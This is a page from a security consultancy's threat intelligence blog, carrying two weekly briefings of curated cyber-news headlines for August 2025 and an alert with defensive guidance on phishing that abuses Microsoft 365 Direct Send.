Threat Intelligence Blog

Contact our Experts Now

Subscribe to our Weekly Cyber Threat Intelligence Briefing

Black Arrow Admin 24/08/2025 Black Arrow Admin 24/08/2025

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025:

-85% of Organisations Approach Cyber Security Reactively

-25% of Security Leaders Replaced After Ransomware Attack

-Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide

-Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations

-‘Impersonation as a Service’ the Next Big Thing in Cybercrime

-URL-Based Threats Become a Go-To Tactic for Cybercriminals

-How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats

-How GenAI Complacency is Becoming Cyber Security’s Silent Crisis

-Fake Employees Pose Real Security Risks

-AI Gives Ransomware Gangs a Deadly Upgrade

-DORA: Six Months into a Resilience Revolution

-Why Your Security Culture is Critical to Mitigating Cyber Risk

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week we start with a look at how organisations react to cyber incidents: studies show that most organisations prioritise their security after they have been attacked, and one in four CISOs lose their job after a ransomware attack even when the incident stems from factors outside their direct control. We discuss emerging attacks, including those focused on CFOs and Regulators, and where English language speakers are hired to help in social engineering attacks. We also spotlight attacks using remote access trojans, and the risks of complacency when using AI while AI itself continues to boost attackers.

Looking ahead, Gartner warns that by 2028 up to one in four job candidates could be artificially generated with associated security risks. Focusing on solutions to address cyber risks, we look at the impact of the EU’s DORA law that aims to build better resilience in the financial services sector. Finally, on the basis that the majority of cyber attacks involve people, including the social engineering attacks referred to earlier, we look at how a security culture is critical to helping to protect your organisation.

Governance, Risk and Compliance

25% of security leaders replaced after ransomware attack | CSO Online

Weak alerting and slipping prevention raise risk levels for CISOs - Help Net Security

Why Your Security Culture is Critical to Mitigating Cyber Risk

UK firms at risk of more cyber incidents - here's how to stay protected | TechRadar

85% of Organizations Approach Cybersecurity Reactively | Security Magazine

C-Suite Lessons From Joe Sullivan And The Uber Data Breach

Employee distraction is a bigger risk than attack sophistication - BetaNews

UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

Threats

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Russia-linked gang using Cisco devices for spying | Cybernews

FBI, Cisco Warn of Russian Attacks on 7-Year Flaw

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Nation State Actors

Swap Around and Find Out: The New Rules of International Digital Economic Warfare – War on the Rocks

China

CrowdStrike warns of uptick in Silk Typhoon attacks this summer | CyberScoop

4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News

Microsoft scales back Chinese access to cyber early warning system

China labels US as 'surveillance empire' over chip tracking • The Register

Chinese hackers are targeting web hosting firms - here's what we know | TechRadar

Microsoft restricts Chinese firms over hacking fears | Windows Central

Chinese APT Group Targets Web Hosting Services in Taiwan - Infosecurity Magazine

China cut itself off from the global internet on Wednesday • The Register

DPRK, China Suspected in South Korean Embassy Attacks

Russia

Russia-linked gang using Cisco devices for spying | Cybernews

Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED

Russian Hacktivists Take Aim at Polish Power Plant, Again

Solana malware targeting Russian crypto developers • The Register

Russian hackers lurked in US courts for years and took sealed files | Stars and Stripes

Russian investment platform confirms cyberattack by pro-Ukraine hackers | The Record from Recorded Future News

Russia-linked European attacks renew concerns over water cybersecurity | CSO Online

Russian Hackers Hitting Critical Infrastructure, FBI Warns

Iran

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Hackers disrupt communications of dozens of Iranian oil and cargo ships | Iran International

North Korea

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

North Korea's IT worker fraud has fooled nearly every Fortune 500 firm

Lazarus strikes again? $23m theft topples crypto platform

South Korean military hit by 9,200 cyber attacks in first half of 2025, up 44% from 2024 | The Straits Times

Hackers who exposed North Korean government hacker explain why they did it | TechCrunch

Tools and Controls

Study: Phishing always works, despite cyber training | Cybernews

Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine

Hackers Weaponizing Cisco's Secure Links to Evade Link Scanning and By-Pass Network Filters

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek

Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise

Hackers can abuse IPv6 to hijack networks | Cybernews

McDonald's not lovin' it when hacker exposes rotten security • The Register

Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

Children’s exposure to porn higher than before 2023 Online Safety Act, poll finds | Pornography | The Guardian

Insurers face challenges with UK ransomware ban

Britons back Online Safety Act’s age checks, but are sceptical of effectiveness and unwilling to share ID | Ipsos

Employee distraction is a bigger risk than attack sophistication - BetaNews

Android VPN apps used by millions are covertly connected AND insecure - Help Net Security

This Authentication Method Is Horribly Insecure—AI Just Made It Worse

CISOs need to think about risks before rushing into AI - Help Net Security

Hackers Abuse Vibe Coding Service to Build Malicious Sites

BYOD Evolution: Essential for Hybrid Work Productivity and Security

How VPNs are helping people evade increased censorship - and much more | ZDNET

78% of Businesses Are Investing in GenAI -- but Just 36% have the Infrastructure to Support It, New Unisys Study Finds

The Security Vulnerabilities to Watch for When You’re Vibe Coding

The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar

How to Vibe Code With Security in Mind

Attackers Start Outside: Why MSSPs Should Prioritize External Threat Intelligence | MSSP Alert

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

Elastic rejects claims of a zero-day RCE flaw in Defend EDR

Is personal cyber insurance at an inflection point? - Insurance Post

Making Pen Testing a Year-Round Cybersecurity Strength | SC Media UK

Solana malware targeting Russian crypto developers • The Register

Other News

Should Europe wean itself off US tech? - BBC News

Hackers can abuse IPv6 to hijack networks | Cybernews

Teen hackers aren't the problem. They're the wake-up call | Computer Weekly

UK firms at risk of more cyber incidents - here's how to stay protected | TechRadar

Aviation Tech Failures Expose Aging Systems and Cyber Risks

Dutch prosecution service attack keeps speed cameras offline • The Register

McDonald's not lovin' it when hacker exposes rotten security • The Register

Teen hacker’s journey: From curiosity to revenge | Cybernews

From medieval stronghold to cyber fortress: shielding Europe’s digital future | Cyprus Mail

Local governments struggle to defend critical infrastructure as threats grow - Help Net Security

How your solar rooftop became a national security issue | TechCrunch

How Outer Space Became the Next Big Attack Surface

UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

Casino outfit Bragg says personal data untouched in attack • The Register

Train Maker Sues Hackers For Exposing Dodgy Efforts To Make Train Repairs More Difficult | Techdirt

What makes airport and airline systems so vulnerable to attack? - Help Net Security

Vulnerability Management

Majority of Organizations Ship Vulnerable Code, Study Finds - Infosecurity Magazine

Attacker “Patches” Vulnerability Post Exploitation to Lock Out Competi - Infosecurity Magazine

Majority of Organizations Ship Vulnerable Code, Study Finds - Infosecurity Magazine

Vulnerabilities

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Researcher to release exploit for full auth bypass on FortiWeb

Microsoft releases emergency updates to fix Windows recovery

At least three UK organizations hit by SharePoint zero-day hacking campaign | The Record from Recorded Future News

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Internet-wide Vulnerability Enables Giant DDoS Attacks

Apple discloses actively exploited zero-day affecting iOS, iPadOS and macOS | CyberScoop

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)

Multiple Chrome High-Severity Vulnerabilities Let Attackers Execute Arbitrary Code

U.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog

Over 800 N-able servers left unpatched against critical flaws

Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise

Easy ChatGPT Downgrade Attack Undermines GPT-5 Security

Xerox fixed path traversal and XXE bugs in FreeFlow Core

New Elastic EDR 0-Day Vulnerability Allows Attackers to Bypass Detection, Execute Malware, and Cause BSOD

High-Severity Vulnerabilities Patched in Chrome, Firefox - SecurityWeek

Public Exploit for Chained SAP Flaws Exposes Unpatched Systems to Remote Code Execution

Commvault plugs holes in backup suite that allow remote code execution - Help Net Security

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

Elastic rejects claims of a zero-day RCE flaw in Defend EDR

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

Microsoft Windows 11 24H2 Update May Cause SSD Failures | TechPowerUp

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin 18/08/2025 Black Arrow Admin 18/08/2025

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 Direct Send abuse enabling internal-appearing phishing

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 'Direct Send' abuse enabling phishing emails from internal addresses

Executive summary

Security researchers and vendors have confirmed active campaigns abusing Microsoft 365’s Direct Send feature to deliver emails that look like they originate from inside an organisation, without any mailbox compromise or authentication. The messages often utilise Microsoft infrastructure and can bypass external security controls, increasing the likelihood of credential theft and business email compromise. Microsoft has released a control that tenants can enable to reject unauthenticated Direct Send. Additional configuration can prevent direct delivery to the tenant when email records are configured to point to a third party.

What’s the risk to me or my business?

Attackers can send emails that impersonate your own users or departments. Common themes include voicemail or fax alerts and PDFs that contain QR codes leading to credential-harvesting pages. Because delivery uses Microsoft endpoints, messages may appear internal and can evade external filtering paths, undermining user trust and raising the success rate of social engineering and payment fraud.

Increased risk of further exploitation through other vulnerabilities

Successful credential theft enables lateral movement, mailbox rule abuse, internal spear-phishing and financial fraud. Some campaigns inject messages via unsecured third-party relays and VPS infrastructure before final delivery to Microsoft 365, complicating attribution and forensics.

What can I do?

Given active exploitation, immediate action is advised.

If you do not need Direct Send, block it
Enable the organisation setting to reject unauthenticated Direct Send traffic using PowerShell. This blocks anonymous messages where the envelope sender domain matches one of your accepted domains. Test, then monitor for breakage in legacy devices or services.
If you need Direct Send, authenticate and restrict it
Create inbound partner connectors and restrict by TLS certificate (preferred) or by approved IP ranges for printers, applications and third-party services that must send as your domain. Where full rejection is not yet possible, use transport rules to quarantine unauthenticated internal-looking mail while you add exceptions for legitimate sources.
Prevent direct delivery bypass when MX points to a third party
If your MX is not Exchange Online, configure an inbound connector and set restrictions so only your approved gateway path can deliver to the tenant. This closes the direct-to-tenant path that might otherwise bypass external filtering.
Strengthen authentication and policy
Enforce SPF, DKIM and DMARC with a reject policy, and tune anti-spoofing. Treat unauthenticated internal-looking messages as suspicious. Consider transport rules that quarantine them by default.
Hunt and monitor
Use Historical Message Trace, Threat Explorer, or Advanced Hunting to identify messages received without an attributed connector. Hunt for unauthenticated internal-looking mail, composite authentication failures and unusual attachment patterns such as PDFs with QR codes.
Prepare users
Brief staff that internal-looking emails can be forged. Call out common lures and warn specifically about QR-code attachments. Encourage out-of-band verification for sensitive requests.

Technical Summary

Abuse mechanism
Direct Send allows devices and applications to send to internal recipients without authentication via tenant smart hosts such as tenantname.mail.protection.outlook.com. Threat actors send spoofed messages to those endpoints using internal-looking From addresses, often with scripted SMTP clients.

Observed tactics
Lures frequently mimic voicemail or fax notifications and include PDFs with QR codes that resolve to credential harvesters. Some campaigns relay through unsecured third-party email appliances or VPS infrastructure before final delivery.

Why it lands
Messages traverse Microsoft infrastructure and can be treated as internal, so they may land in inboxes or junk despite composite authentication failures, especially where mail routing is complex or controls are not locked down.

Microsoft controls
Microsoft introduced a tenant-wide Reject Direct Send setting, plus guidance on preventing direct delivery to the tenant and on quarantine-first transport rules for organisations not ready to block.

Activity timeline
Campaigns observed since May 2025, with multiple vendors reporting ongoing abuse through July and August 2025.

Further information

Microsoft Exchange Team: Introducing more control over Direct Send in Exchange Online. Public preview of Reject Direct Send, behaviour and error text. (TECHCOMMUNITY.MICROSOFT.COM)
Microsoft Exchange Team: Direct Send vs sending directly to an Exchange Online tenant. Lockdown patterns, connectors, hunting and quarantine-first rules. (TECHCOMMUNITY.MICROSOFT.COM)
Varonis Threat Labs: Ongoing campaign abusing Direct Send to deliver internal-appearing phishing, with timeline and technique details. (Varonis)
Proofpoint: Attackers abusing M365 for internal phishing, delivery paths via unsecured relays, and recommended mitigations. (Proofpoint)
Mimecast Threat Intelligence: Direct Send abuse overview, observed artefacts and recommendations. (Mimecast)
eSentire Advisory: Direct Send abuse leading to internal phishing, QR-code lures and response guidance. (eSentire)
Barracuda: Securing Microsoft Direct Send, attack summary and guidance. (Barrcuda Blog)
IRONSCALES: Inside Job: attackers spoofing emails with M365 Direct Send, controls to reduce risk. (IRONSCALES)
BleepingComputer: Microsoft 365 Direct Send abused to send phishing as internal users. (BleepingComputer)

Need help understanding your gaps, or just want some advice? Get in touch with us.

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin 17/08/2025 Black Arrow Admin 17/08/2025

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025:

-Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw

-Nearly Half of Enterprises Tested Had Easily Cracked Passwords

-Leaked Credentials Up 160% - What Attackers Are Doing With Them

-Ransomware Attacks Up by 41% Globally

-Physical Threats to Crypto Owners Hit Record Highs

-The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training

-The Human Firewall: Building a Cyber-Aware Workforce

-Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident

-Attack Yourself First: the Logic Behind Offensive Security

-These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims

-Financial Services Could Be Next in Line for ShinyHunters

-Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating

-Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives

Executive Summary

We begin with two calls to action for stronger cyber security: ensure your systems are patched to fix vulnerabilities, in this case Microsoft Exchange servers, and ensure your team uses strong passwords. We also report on the ongoing rise in cyber attacks including the increase in ransomware, the use of physical violence in cryptocurrency-related incidents, and changes within the attacker community such as a further shift towards the financial services sector.

To address these and other threats, it is essential to have a clear and objective understanding of your risks, and to counter them through a strategy that encompasses people, operations and technology.

The UK Cyber Governance Code of Practice is a valuable reference, even for organisations outside the UK. It includes two key principles: build strong defences through your employees, and rehearse how your leadership team will respond to an incident. It is also strongly recommended to commission assessments from an attacker’s perspective, to identify and resolve vulnerabilities before they are exploited.

Governance, Risk and Compliance

Redefining the Role: What Makes a CISO Great

CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security

APT groups are getting personal, and CISOs should be concerned - Help Net Security

The UK’s ‘chronic shortage of cyber professionals’ is putting the country at risk | IT Pro

The human firewall: Building a cyber-aware workforce

Don't stop at basic protections; make ongoing training a priority | TechRadar

How to implement a blameless approach to cybersecurity | Kaspersky official blog

Mastering control of sovereign digital resilience | Computer Weekly

Navigating the Cybersecurity Budget Tug-of-War

What Is the Three Lines Model and What Is Its Purpose? | Definition From TechTarget

I am a cybersecurity strategist, and here's why businesses need a new cyber defense playbook | TechRadar

Cyber Regulatory Harmonization: The Prospects and Potential Impacts of Current Efforts | Wiley Rein LLP - JDSupra

Professional services firms stuck in network security IT doom loop | Computer Weekly

Beyond the Balance Sheet: The Continued Importance of Cybersecurity in M&A | Blank Rome LLP - JDSupra

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware attacks up by 41 percent globally - BetaNews

ShinyHunters Tactics Now Mirror Scattered Spider

Financial Services Could Be Next in Line for ShinyHunters - Infosecurity Magazine

Cybercrime Groups ShinyHunters, Scattered Spider Join Forces in Extortion Attacks on Businesses

Three notorious cybercrime gangs appear to be collaborating • The Register

Help Desk at Risk: Scattered Spider Shines Light on Overlook Threat Vector - SecurityWeek

Ransomware crews don't care about your EDR • The Register

When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers

Embargo Ransomware Gang Amasses $34.2m in Attack Proceeds - Infosecurity Magazine

MSPs beware – these two ransomware groups are ramping up attacks and have claimed hundreds of victims | ChannelPro

Charon Ransomware Hits Middle East Sectors Using APT-Level Evasion Tactics

New Ransomware Charon Uses Earth Baxia APT Techniques to Target Enterprises | Trend Micro (US)

Crypto24 ransomware hits large orgs with custom EDR evasion tool

Akira Ransomware Exploits SonicWall Zero-Day with BYOVD Evasion

MedusaLocker ransomware group is looking for pentesters

Embargo Ransomware nets $34.2M in crypto since April 2024

Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks | Trend Micro (US)

MuddyWater’s DarkBit ransomware cracked for free data recovery

Ransomware crew dumps 43GB Saint Paul files, no ransom paid • The Register

North Korea Attacks South Koreans With Ransomware

Intel gathered following HSE attack leads to dismantling of ransomware gang – The Irish Times

US govt seizes $1 million in crypto from BlackSuit ransomware gang

Researchers cracked the encryption used by DarkBit ransomware

UK firms turn to back-ups over ransom payments - CIR Magazine

Law Enforcement Disrupts BlackSuit Ransomware Gang

Ransomware Victims

Google suffers a serious data breach at the hands of a ransomware group - PhoneArena

Google Confirms Data Breach - Notifying Users Affected By the Cyberattack

M&S still struggling with IT issues following cyberattack - Retail Gazette

Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine

What happened when cybercriminals hit a recruitment firm

M&S click and collect finally returns months after cyberattack | The Independent

Boeing, US Navy supplier Jamco Aerospace claimed in ransomware attack | Cybernews

Manpower franchise discloses data breach • The Register

Croatian research institute confirms ransomware attack via ToolShell vulnerabilities - Help Net Security

Phishing & Email Based Attacks

The Rise of Native Phishing: Microsoft 365 Apps Abused in Attacks

Threat Actors Personalize Phishing Attacks With Advanced Tactics for Malware Delivery

That email with your name in the subject line might not be from who you think, and it could carry malware | TechRadar

Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install RomCom

WinRAR zero-day exploited to plant malware on archive extraction

Booking.com phishing campaign uses sneaky 'ん' character to trick you

Hackers Using Dedicated Phishlet to Launch FIDO Authentication Downgrade Attacks

UK immigration system targeted by hackers - dangerous new phishing campaign hits Sponsorship Management System | TechRadar

For $40, you can buy stolen police and government email accounts - Help Net Security

Other Social Engineering

Help Desk at Risk: Scattered Spider Shines Light on Overlook Threat Vector - SecurityWeek

Google confirms data breach exposed potential Google Ads customers' info

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

Fraud, Scams and Financial Crime

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

FTC: older adults lost record $700 million to scammers in 2024

WhatsApp Bans 6.8M Scam Accounts in Southeast Asia with AI Tools

Deepfake detectors are coming of age, at a time of dire need • The Register

'Chairmen' of $100 million scam operation extradited to US

Over $300 million in cybercrime crypto seized in anti-fraud effort

Football clubs urged to tighten cyber security for fans at risk from scammers - Inside World Football

Artificial Intelligence

MITRE: Russian APT28's LameHug, a Pilot for Future AI Cyber-Attacks - Infosecurity Magazine

CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security

Red Teams Jailbreak GPT-5 With Ease, Warn It's ‘Nearly Unusable’ for Enterprise - SecurityWeek

Prompt injection vuln found in Google Gemini apps • The Register

Don't fall for AI-powered disinformation attacks online - here's how to stay sharp | ZDNET

Black Hat 2025: ChatGPT, Copilot, DeepSeek now create malware | VentureBeat

Guess what else GPT-5 is bad at? Security | CyberScoop

Leading AI Agents Like ChatGPT Are Vulnerable to Hacking, Security Firm Finds

New Report Warns of Looming Security Crisis as AI Agents Proliferate

62% of People Believe AI Agents Are Easier To Deceive Than Humans - IT Security Guru

Deepfake detectors are coming of age, at a time of dire need • The Register

Research reveals possible privacy gaps in Apple Intelligence’s data handling | CyberScoop

Echo Chamber, Prompts Used to Jailbreak GPT-5 in 24 Hours

From Lab to Deployment: AI-Powered Agents in Action

Google Cloud Warns of AI-Driven Ransomware Threats and Key Defenses

Employees race to build custom AI apps despite security risks - Help Net Security

Chinese biz using AI to influence US politicians • The Register

2FA/MFA

Hackers Using Dedicated Phishlet to Launch FIDO Authentication Downgrade Attacks

FIDO authentication undermined | CSO Online

Malware

Threat Actors Personalize Phishing Attacks With Advanced Tactics for Malware Delivery

That email with your name in the subject line might not be from who you think, and it could carry malware | TechRadar

When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers

Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install RomCom

WinRAR zero-day exploited to plant malware on archive extraction

The Efimer Trojan steals cryptocurrency via malicious torrent files and WordPress websites | Kaspersky official blog

BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks

Adult sites are stashing exploit code inside racy .svg files - Ars Technica

Russia's RomCom among those exploiting a WinRAR 0-day • The Register

This new malware really goes the extra mile when it comes to infecting your devices | TechRadar

Hackers Found Using CrossC2 to Expand Cobalt Strike Beacon's Reach to Linux and macOS

Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot - Infosecurity Magazine

Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks | Trend Micro (US)

Mobile

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

Hackers Could Gain Full Control of Your Rooted Android Devices by Exploiting One Vulnerability

4 ways I spot and avoid phishing scams on my iPhone

KernelSU v0.5.7 Flaw Lets Android Apps Gain Root Access - Infosecurity Magazine

Denial of Service/DoS/DDoS

How to prevent DoS attacks and what to do if they happen | TechTarget

New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP

Critical internet flaw lets attackers crash servers | Cybernews

'MadeYouReset' HTTP2 Vulnerability Enables Massive DDoS Attacks - SecurityWeek

Internet of Things – IoT

BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks

Security flaws in a carmaker's web portal let one hacker remotely unlock cars from anywhere | TechCrunch

Hackers Can Take Over Your Security Cameras—and It’s Easier Than You Think

Hyundai UK charging customers for luxury of secure car locks • The Register

Hackers Went Looking for a Backdoor in High-Security Safes—and Now Can Open Them in Seconds | WIRED

How a chain of security flaws exposed thousands of enterprise surveillance cameras to remote code execution - TechTalks

Hackers love these 7 smart home devices — here’s how to keep them secure | Tom's Guide

Smart Buses flaws expose vehicles to tracking, control, and spying

Data Breaches/Leaks

Leaked Credentials Up 160%: What Attackers Are Doing With Them

Google suffers a serious data breach at the hands of a ransomware group - PhoneArena

The US Court Records System Has Been Hacked | WIRED

New Active Directory Lateral Movement Techniques that Bypasses Authentication and Exfiltrate Data

This infamous people search site is back after leaking 3 billion records - how to remove your data from it ASAP | ZDNET

Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine

The inside story of the Telemessage saga • The Register

North Korean Kimsuky hackers exposed in alleged data breach

Hackers leak 2.8M sensitive records from Allianz Life in Salesforce data breach

U.K. Secretly Spent $3.2 Million to Stop Journalists From Reporting on Data Breach - The New York Times

Cancer care provider breach exposes 113K+ patients | Cybernews

Connex Credit Union data breach impacts 172,000 members

Italian hotels breached en masse since June, gov confirms • The Register

ICE Accidentally Adds Wrong Person to Sensitive Group Chat About Manhunt

Organised Crime & Criminal Actors

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

Three notorious cybercrime gangs appear to be collaborating • The Register

Researchers identify Chinese cybercriminal working for North Korean threat group | NK News

6 ways hackers hide their tracks | CSO Online

Dark web websites: 10 things you should know | CSO Online

Inside the Dark Web’s Access Economy: How Hackers Sell the Keys to Enterprise Networks - SecurityWeek

Cybercriminals Exploit Low-Cost Initial Access Broker Market - Infosecurity Magazine

Threat actors move to smaller more persistent attacks - BetaNews

How money mules powered cyber cons’ ‘operating system’ | Lucknow News - Times of India

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Attackers Target the Foundations of Crypto: Smart Contracts

Crypto hacker steals $14.5 billion in Bitcoin using a gaming PC and nobody notices for five years | TechRadar

Physical Threats to Crypto Owners Hit Record Highs

The rise of real-world cyber threats | Opinion

The Efimer Trojan steals cryptocurrency via malicious torrent files and WordPress websites | Kaspersky official blog

Over $300 million in cybercrime crypto seized in anti-fraud effort

Embargo Ransomware nets $34.2M in crypto since April 2024

Insurance

Cyber insurance market shows early signs of maturity - Help Net Security

How Insurers Use Threat Intelligence to Reduce Losses

Cloud/SaaS

Google Cloud Warns of AI-Driven Ransomware Threats and Key Defenses

Researchers determine old vulnerabilities pose real-world threat to sensitive data in public clouds | CyberScoop

Outages

Major outage at Pennsylvania OAG blamed on 'cyber incident' • The Register

Identity and Access Management

New Active Directory Lateral Movement Techniques that Bypasses Authentication and Exfiltrate Data

Encryption

BitUnlocker - Multiple 0-days to Bypass BitLocker and Extract All Protected Data

New TETRA Radio Encryption Flaws Expose Law Enforcement Communications

Critical SSH vulnerabilities expose enterprise network infrastructure as patching lags | Network World

White House could stymie the UK’s anti-encryption plans? • The Register

Linux and Open Source

BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks

Passwords, Credential Stuffing & Brute Force Attacks

46% of Enterprise Passwords Can Be Cracked | Security Magazine

Leaked Credentials Up 160%: What Attackers Are Doing With Them

Nearly half of enterprises tested had passwords cracked in Picus Security report - SiliconANGLE

Malvertising

Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot - Infosecurity Magazine

Training, Education and Awareness

The human firewall: Building a cyber-aware workforce

Don't stop at basic protections; make ongoing training a priority | TechRadar

Regulations, Fines and Legislation

UK proxy traffic surges as users consider VPN alternatives • The Register

FCC tightens rules on foreign firms building undersea cables, citing security | CyberScoop

Government expands police use of live facial recognition vans - BBC News

Porn site traffic plummets as UK age verification rules enforced - BBC News

Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine

Cyber Regulatory Harmonization: The Prospects and Potential Impacts of Current Efforts | Wiley Rein LLP - JDSupra

UK passport database images used in facial recognition scans • The Register

Home Office explores biometric enrolment via smartphone – PublicTechnology

Eight Countries Face EU Action Over NIS2 Deadline Failings - Infosecurity Magazine

White House could stymie the UK’s anti-encryption plans? • The Register

Campaigners Slam Expansion of Police Facial Recognition Schemes in UK - Infosecurity Magazine

The overlooked changes that two Trump executive orders could bring to cybersecurity | CyberScoop

EU law to protect journalists from spyware takes effect | The Record from Recorded Future News

CISA pledges to continue backing CVE Program after April funding fiasco | The Record from Recorded Future News

Trump's unusual Nvidia deal raises new corporate and national security risks - The Economic Times

Models, Frameworks and Standards

EU Targets Nations Lagging on NIS2 Cyber Rules | SC Media UK

Eight Countries Face EU Action Over NIS2 Deadline Failings - Infosecurity Magazine

Cyber Regulatory Harmonization: The Prospects and Potential Impacts of Current Efforts | Wiley Rein LLP - JDSupra

Careers, Working in Cyber and Information Security

The UK’s ‘chronic shortage of cyber professionals’ is putting the country at risk | IT Pro

Top Cybersecurity Certifications Drive $150K+ Salaries Amid US Shortage

How military leadership prepares veterans for cybersecurity success - Help Net Security

Law Enforcement Action and Take Downs

Dark web websites: 10 things you should know | CSO Online

Over $300 million in cybercrime crypto seized in anti-fraud effort

'Chairmen' of $100 million scam operation extradited to US

US govt seizes $1 million in crypto from BlackSuit ransomware gang

Law Enforcement Disrupts BlackSuit Ransomware Gang

Intel gathered following HSE attack leads to dismantling of ransomware gang – The Irish Times

Misinformation, Disinformation and Propaganda

Don't fall for AI-powered disinformation attacks online - here's how to stay sharp | ZDNET

Your Internet, their rules: How DNS blocking shapes what we see online

Beijing’s hybrid warfare: How China seeks to win Taiwan without firing a shot | Taiwan News | Aug. 10, 2025 13:10

Chinese biz using AI to influence US politicians • The Register

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Commander of Polish Cyberspace Defense Forces: we are in our conflict phase

China Is Winning the Cyberwar | Foreign Affairs

Beijing’s hybrid warfare: How China seeks to win Taiwan without firing a shot | Taiwan News | Aug. 10, 2025 13:10

Nation State Actors

APT groups are getting personal, and CISOs should be concerned - Help Net Security

China

China Is Winning the Cyberwar | Foreign Affairs

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

APT groups are getting personal, and CISOs should be concerned - Help Net Security

Silicon under siege: Nation-state hackers target semiconductor supply chains | CSO Online

Trump's unusual Nvidia deal raises new corporate and national security risks - The Economic Times

Researchers identify Chinese cybercriminal working for North Korean threat group | NK News

Beijing’s hybrid warfare: How China seeks to win Taiwan without firing a shot | Taiwan News | Aug. 10, 2025 13:10

Chinese biz using AI to influence US politicians • The Register

Russia

MITRE: Russian APT28's LameHug, a Pilot for Future AI Cyber-Attacks - Infosecurity Magazine

